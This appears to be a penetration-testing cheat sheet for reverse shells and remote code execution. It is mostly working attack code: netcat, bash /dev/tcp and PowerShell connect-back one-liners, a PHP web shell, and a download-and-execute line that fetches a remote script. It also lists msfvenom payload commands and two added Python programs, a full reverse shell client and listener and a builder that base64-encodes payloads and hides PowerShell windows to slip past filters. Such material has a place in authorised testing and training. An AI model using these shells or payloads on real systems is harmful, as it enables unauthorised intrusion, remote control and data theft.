Reverse Shell / RCE Cheat Sheet


Basic reverse shell

Using netcat to get a reverse shell (note: netcat is rarely present on enterprise/production systems, and many builds, e.g. OpenBSD netcat, ship without the -e option):

nc -e /bin/sh 10.10.10.200 8888

If nc has no -e, use a named pipe so that both the shell's input and output travel over the socket (a plain /bin/sh | nc only carries output back and cannot receive commands):

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.10.200 8888 > /tmp/f

& listening for it to catch it:

nc -lvnp 8888

Switches:
-l | listen mode, for inbound connections
-v | verbose
-n | numeric-only IP addresses, not DNS.
-p | local port number

Simple PHP web shell

If we can upload a file onto a target web server, or edit an existing file, this is a very simple shell:

<?php echo shell_exec($_GET['cmd']); ?>

Visit the uploaded file to run system commands (URL-encode the command, e.g. spaces as %20 and ; as %3B, or the web server will truncate it):

http://<target>/webshell.php?cmd=<commands>

Upgrading shells

Using Python (the binary may be python3 on newer systems):

python -c 'import pty; pty.spawn("/bin/bash")'

Using stty to get a fully interactive tty (tab completion, Ctrl-C without losing the shell):

# In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In your own terminal (note the output of stty size: rows and columns, needed below)
$ stty size
$ stty raw -echo
$ fg

# Back in the reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

Bash TCP (the /dev/tcp pseudo-device is a bash feature, so the interpreter must be bash, not sh/dash):

$ bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
$ 0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196

Bash UDP (useful when TCP egress is filtered; the >& redirection is bash syntax, so invoke bash explicitly)

# Victim
$ bash -i >& /dev/udp/10.10.10.1/8888 0>&1

# Listener
$ nc -u -lvp 8888

PowerShell

The one-liners connect back with a TCPClient, then loop: read a line, run it with iex, send stdout+stderr back followed by a "PS <cwd>> " prompt. Catch them with nc -lvnp 4242.

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $client = New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Download-and-execute variant (needs outbound HTTPS from the target; edit LHOST/LPORT in the script before use):

powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')
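The same read / execute / send-back-with-prompt loop as the PowerShell one-liner, written out in Python as an added example (not code from the original cheat sheet). Both ends run in one process over 127.0.0.1 so the mechanism can be exercised offline: the "victim" thread connects out and executes whatever arrives, the "attacker" side accepts the connection, sends commands and collects the output between prompts. The loopback address, the "$ " prompt and /bin/sh as the executing shell are assumptions for the demo.

```python
"""Minimal reverse shell pair: connect-back client (victim side) plus a
listener (attacker side) that drives it. Added example; mirrors the loop in
the PowerShell payload above. Assumes a Unix host with /bin/sh."""
import socket
import subprocess
import threading

PROMPT = b"$ "   # assumed prompt marker; the PowerShell version uses "PS <cwd>> "


def reverse_shell_client(lhost: str, lport: int, shell: str = "/bin/sh") -> None:
    """Victim side: connect out to LHOST:LPORT, then loop: read a command line,
    run it through the shell, send stdout+stderr back followed by a prompt."""
    with socket.create_connection((lhost, lport)) as sock:
        sock.sendall(PROMPT)          # first prompt tells the listener we are in
        buf = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:             # listener closed the connection
                return
            buf += chunk
            while b"\n" in buf:       # commands are newline-delimited
                line, buf = buf.split(b"\n", 1)
                cmd = line.decode(errors="replace").strip()
                if cmd == "exit":
                    return
                proc = subprocess.run(cmd, shell=True, executable=shell,
                                      stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
                sock.sendall(proc.stdout + PROMPT)


def _read_until_prompt(conn: socket.socket) -> str:
    """Read until the remote prompt appears; return the output before it."""
    data = b""
    while not data.endswith(PROMPT):
        chunk = conn.recv(4096)
        if not chunk:
            return data.decode(errors="replace")
        data += chunk
    return data[:-len(PROMPT)].decode(errors="replace")


def catch_shell(listener: socket.socket, commands: list) -> list:
    """Attacker side (what nc -lvnp does by hand): accept one connection, send
    each command, return the output of each."""
    conn, _ = listener.accept()
    outputs = []
    with conn:
        _read_until_prompt(conn)      # swallow the initial prompt
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            outputs.append(_read_until_prompt(conn))
        conn.sendall(b"exit\n")
    return outputs


def demo(commands: list) -> list:
    """Run listener and victim in one process over loopback; return the outputs."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    victim = threading.Thread(target=reverse_shell_client,
                              args=("127.0.0.1", port), daemon=True)
    victim.start()
    try:
        return catch_shell(listener, commands)
    finally:
        listener.close()
        victim.join(timeout=5)


if __name__ == "__main__":
    for out in demo(["id", "uname -a", "echo to-stderr 1>&2"]):
        print(out, end="")
```

Note that stderr is merged into stdout before it is sent back, exactly as `2>&1` does in the bash one-liners and `iex $data 2>&1` does in PowerShell; without that, errors from the victim side are silently lost.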

Msfvenom Payloads (non-meterpreter)

Windows staged reverse TCP (the exe only contains a stager; it needs a Metasploit handler, exploit/multi/handler with the same payload, to send the second stage. A plain nc listener will not work.)

x86 | msfvenom -p windows/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell-x86.exe

Windows stageless reverse TCP (self-contained, can be caught with nc -lvnp <lport>)

x86 | msfvenom -p windows/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell-x86.exe

x64 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell-x64.exe

Staged Payloads for Linux

x86 | msfvenom -p linux/x86/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x86.elf

x64 | msfvenom -p linux/x64/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x64.elf

Stageless Payloads for Linux

x86 | msfvenom -p linux/x86/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x86.elf

x64 | msfvenom -p linux/x64/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f elf > shell-x64.elf

Web Shells

asp | msfvenom -p windows/shell/reverse_tcp LHOST=<lhost> LPORT=<lport> -f asp > shell.asp

jsp | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f raw > shell.jsp

WAR shell: if we have access to a Tomcat server's management interface (the manager application), we can deploy a WAR file | msfvenom -p java/jsp_shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f war > shell.war

php | msfvenom -p php/reverse_php LHOST=<lhost> LPORT=<lport> -f raw > shell.php
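Most failures with the one-liners on this page are delivery problems rather than payload problems: PowerShell's -EncodedCommand wants base64 of UTF-16LE bytes (not UTF-8), a command sent through the PHP web shell's ?cmd= parameter has to be percent-encoded, and a bash /dev/tcp payload injected through a filter that mangles >, & or / is easier to deliver base64-wrapped. The builder below, an added example and not part of the original cheat sheet, produces these forms from one LHOST/LPORT and validates the target first; the PowerShell script body is the one-liner from the PowerShell section above, and the function names and the -nop -w hidden -enc flag spelling are this example's own choices.

```python
"""Build the delivery forms of this page's payloads from one LHOST/LPORT.
Added example. Pure string/encoding work, runs offline."""
import base64
import ipaddress
from urllib.parse import quote


def is_valid_target(lhost: str, lport: int) -> bool:
    """Reject typos before they end up in a payload that silently never connects."""
    try:
        ipaddress.ip_address(lhost)
    except ValueError:
        return False
    return 1 <= lport <= 65535


def _check(lhost: str, lport: int) -> None:
    if not is_valid_target(lhost, lport):
        raise ValueError(f"bad LHOST/LPORT: {lhost}:{lport}")


def nc_mkfifo(lhost: str, lport: int) -> str:
    """netcat variant that works without -e (named pipe carries stdin)."""
    _check(lhost, lport)
    return (f"rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 "
            f"| nc {lhost} {lport} > /tmp/f")


def bash_tcp(lhost: str, lport: int) -> str:
    _check(lhost, lport)
    return f"bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"


def bash_tcp_b64(lhost: str, lport: int) -> str:
    """Base64-wrapped form: only [A-Za-z0-9+/=] and a pipe reach the injection point."""
    b64 = base64.b64encode(bash_tcp(lhost, lport).encode()).decode()
    return f"echo {b64} | base64 -d | bash"


def powershell_encoded(lhost: str, lport: int) -> str:
    """PowerShell reverse shell as `powershell -nop -w hidden -enc <b64>`.
    -EncodedCommand decodes base64 to UTF-16LE, so encode with utf-16le
    (no BOM); utf-8 here yields garbage that PowerShell cannot parse."""
    _check(lhost, lport)
    script = (
        f"$client = New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});"
        "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};"
        "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){"
        "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);"
        "$sendback = (iex $data 2>&1 | Out-String );"
        "$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';"
        "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
        "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
    )
    enc = base64.b64encode(script.encode("utf-16le")).decode()
    return f"powershell -nop -w hidden -enc {enc}"


def decode_powershell_enc(cmdline: str) -> str:
    """Inverse of powershell_encoded; also handy for triaging a suspicious -enc
    command line seen in process-creation logs."""
    b64 = cmdline.split("-enc ", 1)[1].strip()
    return base64.b64decode(b64).decode("utf-16le")


def webshell_url(base_url: str, cmd: str) -> str:
    """URL for the <?php echo shell_exec($_GET['cmd']); ?> web shell.
    quote() keeps '/' but encodes space, ';', '&', '|' etc. so the whole
    command reaches PHP instead of being split by the query parser."""
    return f"{base_url}?cmd={quote(cmd)}"


if __name__ == "__main__":
    lhost, lport = "10.0.0.1", 4242          # constructed sample values
    print(nc_mkfifo(lhost, lport))
    print(bash_tcp_b64(lhost, lport))
    print(powershell_encoded(lhost, lport))
    print(webshell_url("http://target/webshell.php", "cat /etc/passwd"))
```

The decode helper is worth keeping around on the defensive side too: the same UTF-16LE/base64 round trip is what you need to read an -enc argument out of a Sysmon or 4688 command line.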